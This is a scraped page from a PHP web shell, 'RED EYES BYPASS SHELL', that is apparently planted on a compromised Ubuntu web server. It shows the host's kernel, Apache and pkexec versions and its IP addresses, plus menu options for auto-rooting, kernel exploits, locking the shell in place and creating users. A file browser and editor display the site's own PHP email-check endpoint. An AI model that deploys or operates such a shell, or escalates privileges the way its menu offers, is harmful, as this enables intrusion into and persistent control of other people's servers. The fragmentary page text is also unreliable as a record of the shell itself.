Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
API /
reg /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
conTroller.php
1.29
KB
-rwxr-xr-x
server.php
6.61
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : conTroller.php
<?php try { require_once("../../server/server.php"); if ($_SERVER["REQUEST_METHOD"] == "POST") { $data = json_decode(file_get_contents("php://input"), true); if ($data !== "") { $email = $data["value"]; $stmp = $db->prepare("SELECT count(email) FROM user WHERE email LIKE BINARY :email"); $stmp->bindValue(":email", $email, PDO::PARAM_STR); if ($stmp->execute()) { $row = $stmp->fetchColumn(); http_response_code(200); echo json_encode(array("status" => true, "message" => "success", "used" => (int)$row)); exit; } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Server sql Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Data required!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Request method Not accept!!")); exit; } } catch (Exception $e) { http_response_code(405); echo json_encode(array("status" => false, "message" => $e->getMessage())); exit; }
Close